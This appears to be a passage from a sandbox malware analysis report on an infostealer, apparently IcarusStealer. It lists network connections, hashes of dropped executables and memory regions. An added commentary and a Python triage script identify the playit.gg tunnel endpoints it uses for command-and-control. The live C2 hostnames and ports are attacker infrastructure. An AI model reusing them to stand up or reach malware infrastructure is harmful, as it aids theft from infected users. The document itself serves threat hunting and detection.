US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
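The table mixes four kinds of traffic. The in-addr.arpa rows are reverse (PTR) lookups of addresses the machine contacted and carry no indicator value. The single HTTPS connections to keyauth.win and raw.githubusercontent.com match the loader's licence check and the "Legitimate hosting services abused for malware hosting/C2" signature. The HTTP fetch from x2.c.lencr.org is a Let's Encrypt CRL download, certificate-validation noise rather than attacker infrastructure. The rest is a long run of TCP connections alternating between 147.185.221.17:26501 (case-shield.gl.at.ply.gg, the endpoint named on the cvtres.exe command line; 21 connections in the table) and 147.185.221.18:52033 (operating-noble.gl.at.ply.gg; 17 connections). Both names sit under gl.at.ply.gg, the free playit.gg tunnelling service, so the addresses belong to the tunnel provider and the indicator worth keeping is the hostname and port pair, not the IP. Note also that the 127.0.0.1 rows have no Domain value, so a parser of this layout has to tolerate a three-field row. The Python below is an added example, not part of the report: it parses an excerpt of the rows copied from this table, handles the short loopback rows, separates resolver and CRL noise from the tunnel traffic, and counts connections per endpoint. The category names and the TUNNEL_SUFFIXES list are this example's own.

```python
"""Network-table triage for the sandbox report above.

Added example, not part of the report. Parses rows in the report's
"Country Destination Domain Proto" layout, tolerates loopback rows whose
Domain column is absent (or given as N/A), and separates resolver and
CRL noise from the repeated connections to the playit.gg tunnel endpoints.
NETWORK_EXCERPT is copied from the table above; category names are ours.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

NETWORK_EXCERPT = """
Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 8.8.8.8:53 case-shield.gl.at.ply.gg udp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
N/A 127.0.0.1:58070 tcp
N/A 127.0.0.1:58072 tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
US 147.185.221.17:26501 case-shield.gl.at.ply.gg tcp
"""

# playit.gg tunnel suffix; the cvtres.exe command line above names
# case-shield.gl.at.ply.gg:26501 as the IcarusStealer client endpoint.
TUNNEL_SUFFIXES = (".ply.gg",)
# Let's Encrypt CRL host: certificate-validation traffic, not attacker infrastructure.
CERT_VALIDATION_HOSTS = {"x2.c.lencr.org"}


@dataclass(frozen=True)
class Flow:
    country: str
    ip: str
    port: int
    domain: Optional[str]
    proto: str


def parse_network_table(text: str) -> List[Flow]:
    """Parse report rows; a three-field row or an N/A domain means no name was seen."""
    flows: List[Flow] = []
    for line in text.strip().splitlines():
        parts = line.split()
        if not parts or parts[0] == "Country":
            continue  # blank line or header row
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:  # loopback rows in the report carry no Domain column
            country, dest, proto = parts
            domain = "N/A"
        else:
            raise ValueError(f"unexpected row layout: {line!r}")
        ip, port = dest.rsplit(":", 1)
        flows.append(Flow(country, ip, int(port), None if domain == "N/A" else domain, proto))
    return flows


def classify_flow(f: Flow) -> str:
    if f.ip.startswith("127."):
        return "loopback"
    if f.proto == "udp" and f.port == 53:
        return "dns_ptr" if (f.domain or "").endswith(".in-addr.arpa") else "dns_query"
    if f.domain in CERT_VALIDATION_HOSTS:
        return "cert_validation"
    if f.domain and f.domain.endswith(TUNNEL_SUFFIXES):
        return "tunnel_service"
    if f.port in (80, 443):
        return "web"
    return "nonstandard_tcp"


def summarize(flows: List[Flow]) -> Dict[str, int]:
    return dict(Counter(classify_flow(f) for f in flows))


def resolved(flows: List[Flow]) -> Dict[str, Set[str]]:
    """Name -> addresses actually connected to over TCP (pairs the DNS answer with the flow)."""
    out: Dict[str, Set[str]] = {}
    for f in flows:
        if f.proto == "tcp" and f.domain:
            out.setdefault(f.domain, set()).add(f.ip)
    return out


def c2_candidates(flows: List[Flow]) -> Dict[str, int]:
    """Connections to tunnel or non-standard-port endpoints, counted per host:port."""
    return dict(Counter(
        f"{f.domain or f.ip}:{f.port}"
        for f in flows
        if classify_flow(f) in ("tunnel_service", "nonstandard_tcp")
    ))


if __name__ == "__main__":
    fl = parse_network_table(NETWORK_EXCERPT)
    print(summarize(fl))
    print(c2_candidates(fl))
```

Run against the full table the two tunnel endpoints dominate the counts; on a live host the same host:port pairs, not the 147.185.221.x addresses, are what to block and hunt for, since the tunnel provider's addresses are shared with unrelated users.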

Files

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 d4b5b842a71842fbfb3ea14e4752994a
SHA1 58c532183fdbf32d2e8f8ffaf02479ab0ccfb648
SHA256 501b93b3da9435d5061e0e206b642feb767a6f181f964873ffdcd72c17091ce2
SHA512 900b0f15db2ac3410eaaa44b52e8e9abe963cd0b202cdbed5898438a111eca52219458e3fc827274a6ad2c317bbd7678e3b33fab99de64c4f98beee462a679d2

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 cb7c1e1ce6e5917ad52dd699772002bb
SHA1 bc05624df83cced4ed945ac3182ac97049bc7586
SHA256 b7d1dbc8e0b381bf95928464a039b96187fbb1401dcf1ec9de5dc4cba615b7a7
SHA512 9f827425bf85a29d787e456931ae6bd0161432902b3748b4dd7237924838f888fba83853e9e0d0daf3c4ee1cbc78fab8634c375a7722f057f15a4ddc12ed4ee8

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 4e25df8616a51277577cbca1ac024c7d
SHA1 363f6f7d76493f8e2db60c462c8ec8f1b270dc6b
SHA256 56c4cc17a8d5314fab836914c0795c143e72aa804dbe3c831d2a50d74b4ec920
SHA512 6da3eae6f206d572e58605d0716eb992bdc6f35954cc00f629f34b1ead3c965071a0c63ba971d8a8269e208d9792acfa1fdb9e408ac6116a3f029afba6dfc3e1

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 c43c6b0bd656e1ba60690995939b9f75
SHA1 c101e9ba0e487c22833307f22aeaf03fab091e2f
SHA256 cc2493b30cbc923f27363a1fe64f1b86ccb7640dbe052b78afc09999522cac0b
SHA512 fa6a563e3dc92efba52466d45bd38f7485022d9ff13718cf8df7fb911bea81d2e1fd699edad8dda0ada87b03e7ce1e3d5d1f04c4ccc894d6c4c49455b791d3ed

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 0231ebffd43377d7d73ea910d668fd9f
SHA1 47c29cf6cfbd76af125fa2ed6001bd748066ced0
SHA256 ddc3a29559988736a1279b03e28ae505feeb97c45382d21365ee18fb35b6c382
SHA512 f9a4043beac571ad7155442cc669b7c99978909116e73efc91e75be62b9dbd66c23899d3658df4c48ad3742edaffcb77af43de7b1110126b2f942d0d787e8352

memory/1240-19-0x0000000000670000-0x0000000000CB0000-memory.dmp

memory/1240-21-0x0000000073660000-0x0000000073E10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 acb22b3d1c086716a323f11a60545b4a
SHA1 22319f4714f46724599ae23908cf5b740cd215b9
SHA256 dc182e06eca44bd2a8c411261ebfb02e1f52a8d3fec65b04f7dbd45b3e7e5cf0
SHA512 60a6eb955d08169be41cc189d2a9ba755d3d16d35e05fdb7242565a416e8c450259cca9e888003cd141c34b8571387753535354dac9a3583b7d1d51146e5fa16

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 4dcca46d90e94ee61f2e4f91630c4c5b
SHA1 47da5bc5b96897569d939a3307f6b7d0547638ba
SHA256 412de232d1b7004172028a8b636b90b9e3930c87b8e59e6e2a7036394d30df29
SHA512 ce7ecf3686f092d348c07d2a7d62fbca16b92bba45a873f001228741e32915287e878f6683abe89f7649d80bfb999afdbe564ab5c9ec2707e13e38b00b3467fd

memory/4624-39-0x00007FF605E10000-0x00007FF60624C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 0f0838bc6642dd6bc603368e50b4aba3
SHA1 932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA256 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512 a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 b49500d5202af4a3257cf8c4575400ad
SHA1 ab3d5866bcb1b414a24794a12aa990c52f0af358
SHA256 0dffc6060d73e4a0bf0fd4e00bcfefeeb2c1c2e7d59e75f1d8d6eba363270adf
SHA512 bb233afc2c2074318a393bc9047798e4453dd776b741be2639f0b5a9e3caeb30ade2ffe844e688ea024ec95f05a7beb13e0030b1e28f35b8bd32769d5e2dfecb

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 7c286c763b22da89a4b329e3a8edb5f8
SHA1 6e248c7492dddf492f320ab97ba24cf8635991f1
SHA256 553c1c192299b440b79b01879f4ee0445f3ec172dd63bbed004ae12fb21cc1b6
SHA512 f78773d9a87ac88305ab518e76ac74d948ade03184ba816ce85125efbf346e694da28ea985a4b8fa52c2bb445f8675e2e7ece1bf0789d573b5528e8a41c0257e

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 4eeec1feb547ee82c53b254fc8f235bb
SHA1 c36c439b3583f59adff7835aa0589d32305ba482
SHA256 77f82cdea54ec261f67a62fd4058715adf4815cb5ab1e9ce7dded45b62e1ae35
SHA512 15ab1a5ea145347650ce66f20db16638fbb39a85921c9415fddcb43e7b366441585d36d2f0edca8b95c311527dd2d95425400cd236d86b78d1f160191c716c50

memory/992-41-0x00000000000D0000-0x0000000000152000-memory.dmp

memory/992-42-0x00000000049B0000-0x0000000004A4C000-memory.dmp

memory/992-45-0x0000000004C80000-0x0000000004C90000-memory.dmp

memory/992-46-0x0000000006650000-0x0000000006BF4000-memory.dmp

memory/992-44-0x0000000004A50000-0x0000000004AE2000-memory.dmp

memory/992-43-0x0000000073660000-0x0000000073E10000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\2vvhbn10\2vvhbn10.cmdline

MD5 daba48829048f457e40bc9812a12a720
SHA1 d65d9f14cad062f82ca907568b4172d5b71097b7
SHA256 716a398bbdbac39a222a887985a23383b15a0ec76b21a87ad0039c3021b0683a
SHA512 5af619e2fb0fcc54363580359f2c6e237a50c59fcf38d3811a0530c68c36792a4ac6ed5212bd47474d995347a481ab1837a53b13551f211126e15b318f7897c4

\??\c:\Users\Admin\AppData\Local\Temp\2vvhbn10\2vvhbn10.0.cs

MD5 14846c9faaef9299a1bf17730f20e4e6
SHA1 8083da995cfaa0e8e469780e32fcff1747850eb6
SHA256 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

memory/844-59-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RES5488.tmp

MD5 bc04e8e885be564ab443c2a36f02effc
SHA1 a047dd2c5829f6edcf7d8df95276448441d5978c
SHA256 676760d00c7024bb247b3f96edf40a9fa7fa21ce8c3eeef1ed35264e61d81703
SHA512 5a8462de3c5fef76852f6320507e2f84e9633e8925f9d971da6b0c4deb2700d066a21b2500742ba6749fe72dc067590ffd37e2378abfe1143d53874b14abd5a7

memory/844-60-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/844-61-0x0000000005230000-0x0000000005240000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\CSC6FB58647E86F4633B75AC84240E5CCD1.TMP

MD5 1d5543c367c49b9dd6366270fdd4ee3a
SHA1 bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66
SHA256 502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2
SHA512 86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

C:\Users\Admin\AppData\Local\Temp\YourPhone.exe

MD5 f741e15c63bb0e3ec458d27216db8e9f
SHA1 5b18ac4f8c5fa8501a285bcf3afa6d648da591a7
SHA256 60a1c0c015c71c049e72dddd000a8ac4931eb97b0dc52d3beee62d8426b398a0
SHA512 40da2b64b21d0f40e219931a8d4a0bb8742d59bca14c516f6703a0e78e9ad70f6821dc0ce5c959a7fefa71e3408413c697528d420e65d000fbb8194b868a8a79

memory/3400-65-0x00000000002D0000-0x00000000002D8000-memory.dmp

memory/3944-66-0x0000000004830000-0x0000000004866000-memory.dmp

memory/3400-67-0x00007FFB2E7B0000-0x00007FFB2F271000-memory.dmp

memory/3944-68-0x0000000004950000-0x0000000004960000-memory.dmp

memory/3944-69-0x0000000004F90000-0x00000000055B8000-memory.dmp

memory/3944-73-0x0000000004950000-0x0000000004960000-memory.dmp

memory/3944-71-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/992-72-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/3944-74-0x0000000004EA0000-0x0000000004EC2000-memory.dmp

memory/3944-76-0x0000000005770000-0x00000000057D6000-memory.dmp

memory/3944-78-0x0000000005850000-0x00000000058B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_otnet2mm.2lr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2172-79-0x00000000046A0000-0x00000000046B0000-memory.dmp

memory/3944-89-0x00000000058C0000-0x0000000005C14000-memory.dmp

memory/1240-90-0x0000000005780000-0x0000000005790000-memory.dmp

memory/2172-77-0x00000000046A0000-0x00000000046B0000-memory.dmp

memory/2172-75-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/1240-91-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/1240-101-0x00000000055F0000-0x0000000005612000-memory.dmp

memory/3944-102-0x0000000005E80000-0x0000000005E9E000-memory.dmp

memory/3944-103-0x0000000005F40000-0x0000000005F8C000-memory.dmp

memory/1240-110-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/3944-111-0x0000000006E20000-0x0000000006E52000-memory.dmp

memory/3944-112-0x000000007FAC0000-0x000000007FAD0000-memory.dmp

memory/4624-114-0x00007FF605E10000-0x00007FF60624C000-memory.dmp

memory/3944-113-0x000000006FEE0000-0x000000006FF2C000-memory.dmp

memory/3944-126-0x0000000007120000-0x00000000071C3000-memory.dmp

memory/3944-125-0x0000000004950000-0x0000000004960000-memory.dmp

memory/3944-127-0x0000000004950000-0x0000000004960000-memory.dmp

memory/3944-124-0x0000000006E00000-0x0000000006E1E000-memory.dmp

memory/2172-129-0x000000006FEE0000-0x000000006FF2C000-memory.dmp

memory/844-128-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/2172-139-0x00000000046A0000-0x00000000046B0000-memory.dmp

memory/3944-140-0x0000000007850000-0x0000000007ECA000-memory.dmp

memory/3944-141-0x0000000006EF0000-0x0000000006F0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp68CC.tmp.bat

MD5 ec51455fda86d75d891b548e949db65b
SHA1 fa5692b18d3e94ab9e2d11f266547f3c8d3ebeac
SHA256 a21d420d17148532fe9fb326a632e9605f6b47ee93d98985d07b46ba242b5d0b
SHA512 61d971428729acc9e853451b4ef410b190c2c911c7f3a399b5451b8fde8a759c24fbb74ee911dd38a532d4543854d68ec43463e6da4ffec3645d01f003aa1529

memory/3944-143-0x0000000007230000-0x000000000723A000-memory.dmp

memory/3944-144-0x0000000007420000-0x00000000074B6000-memory.dmp

memory/2172-145-0x0000000007020000-0x0000000007031000-memory.dmp

memory/3944-146-0x00000000073E0000-0x00000000073EE000-memory.dmp

memory/2172-147-0x0000000007060000-0x0000000007074000-memory.dmp

memory/2172-148-0x0000000007150000-0x000000000716A000-memory.dmp

memory/2172-149-0x0000000007140000-0x0000000007148000-memory.dmp

memory/2172-152-0x0000000073660000-0x0000000073E10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 921ec71d0e8fa4ceb3b894032ae7d787
SHA1 35190a3d6716395a133ef21da414e49450e268e8
SHA256 f8905ee21421d72cd4a45a64694bd716f3639af1d8d806a9db18d441d0545a66
SHA512 ba8e6b46f300c488c5756dc38af93f0caf17fca1a012c4695b0e7810ef6786d5326f0bb12c52f97d0c80e4aaa6884c0ec98f83d548d670af4bc4421f8e319354

memory/3944-156-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/4280-158-0x0000000002630000-0x0000000002631000-memory.dmp

memory/2560-164-0x0000028CCDC20000-0x0000028CCDC40000-memory.dmp

memory/2560-168-0x0000028CCDFF0000-0x0000028CCE010000-memory.dmp

memory/2560-166-0x0000028CCD9E0000-0x0000028CCDA00000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 a90eacae53326f8f158592f7c5640113
SHA1 e01cf7007db6b3fc650aac5a1929cc51c7114466
SHA256 556e37760a7987ad2ddc367a01ced5f3febfccdcf7040c04aa139e5157aea15e
SHA512 6064814bf2f88de3442baefd48c43421926b4b60195788338be37a55324cf9f2a236cc334e276ac32ad66bb175afd1fd4f050a27c61559c9896ea258d6f944a6

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 a5dc894e40057b15a6ea19cdfb2081e6
SHA1 08693e0845f40cb2c70e3d122cb66e8d4d2d7568
SHA256 cdd986938f3474348b43c744277b213c6ea01b86636b70279d2fc5fa7faad1f0
SHA512 9747700a4cd43407bebc78f24f739fd8b5c057b214514c02e71ece17a2ab37d0f0eecf7a620cd38944f895deeee1a756a88aa8c2e5927b39ca5323bf21eab2bd

memory/3952-181-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/3400-182-0x00007FFB2E7B0000-0x00007FFB2F271000-memory.dmp

memory/2560-185-0x00000284CB000000-0x00000284CC92F000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133549113784399004.txt

MD5 c09e63e4b960a163934b3c29f3bd2cc9
SHA1 d3a43b35c14ae2e353a1a15c518ab2595f6a0399
SHA256 308deca5e1ef4d875fbe0aff3ce4b0b575b28e643dffda819d4390ec77faf157
SHA512 5ca3321034dff47e3afe0b0bdfaffc08782991660910a29375a8e0363794b78247282aba65dbd882ae225aa140ae63927dfd0946a441ee6fa64a1d8c146777b9

memory/3952-201-0x0000000005060000-0x0000000005070000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\QDDM1QX5\microsoft.windows[1].xml

MD5 2415f1b0b1e5150e9f1e871081fd1fad
SHA1 a79e4bfddc3daf75f059fda3547bd18282d993f7
SHA256 3eff25035403aba506d0dbf69c76a22fa90ec66d2094cbf39bc5267a850902ae
SHA512 5d05da9ec1471dbf91f0c474c8db3897130543ff3c4da70724ce3a36adc38f628264c3dae4f54caef493f7593a0986a944dda0e19e947f3dfc34fc16fbd3e6bb

memory/4564-209-0x000001DD877E0000-0x000001DD87800000-memory.dmp

memory/4564-211-0x000001DD877A0000-0x000001DD877C0000-memory.dmp

memory/4564-212-0x000001DD87BF0000-0x000001DD87C10000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

MD5 3f9c7ac5c5f341c9423480942c67500a
SHA1 62647104a246b91ad10f53ebacdb104b60d86293
SHA256 08cbd4166475d4c5052f8210b6bdb1a56df36e70545e29b5b4e7436a5676e059
SHA512 5d56f8dde71dcd473c7167463ad1f70ae2848497228d0c6ac84b2f7a2db706ca6629d5491eefbe664337137dc7158abdde11719506a3b9ade45fb2fafc035aca

C:\Windows\System32\CatRoot\$SXR\Read.txt

MD5 79668a6729f0f219835c62c9e43b7927
SHA1 0cbbc7cc8dbd27923b18285960640f3dad96d146
SHA256 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512 bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

memory/4564-226-0x000001DD850B0000-0x000001DD869DF000-memory.dmp

memory/4048-237-0x000002D12EA90000-0x000002D12EAB0000-memory.dmp

memory/4048-235-0x000002D12EAD0000-0x000002D12EAF0000-memory.dmp

memory/4048-241-0x000002D12EEA0000-0x000002D12EEC0000-memory.dmp

memory/4048-249-0x000002C92BE00000-0x000002C92D72F000-memory.dmp

memory/5028-257-0x000001D05C9B0000-0x000001D05C9D0000-memory.dmp

memory/5028-259-0x000001D05C970000-0x000001D05C990000-memory.dmp

memory/5028-263-0x000001D05CD80000-0x000001D05CDA0000-memory.dmp

memory/5028-271-0x000001C859C00000-0x000001C85B52F000-memory.dmp

memory/3304-279-0x000002445E670000-0x000002445E690000-memory.dmp

memory/3304-281-0x000002445E630000-0x000002445E650000-memory.dmp

memory/3304-284-0x000002445EA40000-0x000002445EA60000-memory.dmp

memory/3304-293-0x0000023C5BA30000-0x0000023C5D35F000-memory.dmp

memory/3952-294-0x0000000073660000-0x0000000073E10000-memory.dmp

memory/3952-295-0x0000000005060000-0x0000000005070000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15

MD5 0e2a09c8b94747fa78ec836b5711c0c0
SHA1 92495421ad887f27f53784c470884802797025ad
SHA256 0c1cdbbf6d974764aad46477863059eaec7b1717a7d26b025f0f8fe24338bb36
SHA512 61530a33a6109467962ba51371821ea55bb36cd2abc0e7a15f270abf62340e9166e66a1b10f4de9a306b368820802c4adb9653b9a5acd6f1e825e60128fd2409

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel

MD5 fb5f8866e1f4c9c1c7f4d377934ff4b2
SHA1 d0a329e387fb7bcba205364938417a67dbb4118a
SHA256 1649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170
SHA512 0fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c